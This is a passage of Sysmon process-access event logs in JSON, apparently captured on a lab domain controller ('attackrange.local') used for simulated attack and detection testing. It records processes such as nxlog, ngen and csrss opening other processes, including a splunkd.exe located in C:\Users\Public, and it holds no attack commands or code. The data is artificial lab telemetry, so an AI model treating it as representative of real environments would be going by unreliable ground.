(x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:05.621","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7618,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:05.653\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1331-5F25-0000-0010FAB80B00}\r\nTargetProcessId: 4528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:05.653","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1331-5F25-0000-0010FAB80B00}","TargetProcessId":"4528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7619,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:05.653\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1331-5F25-0000-0010FAB80B00}\r\nTargetProcessId: 4528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:05.653","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1331-5F25-0000-0010FAB80B00}","TargetProcessId":"4528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7620,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:05.668\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1331-5F25-0000-0010FAB80B00}\r\nTargetProcessId: 4528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:05.668","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1331-5F25-0000-0010FAB80B00}","TargetProcessId":"4528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7621,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:05.684\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1331-5F25-0000-0010F5BB0B00}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:05.684","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1331-5F25-0000-0010F5BB0B00}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7622,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:05.684\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1331-5F25-0000-0010F5BB0B00}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:05.684","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1331-5F25-0000-0010F5BB0B00}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7623,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:05.700\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1331-5F25-0000-0010F5BB0B00}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:05.700","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1331-5F25-0000-0010F5BB0B00}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7624,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:05.731\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1331-5F25-0000-0010B0BF0B00}\r\nTargetProcessId: 3796\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 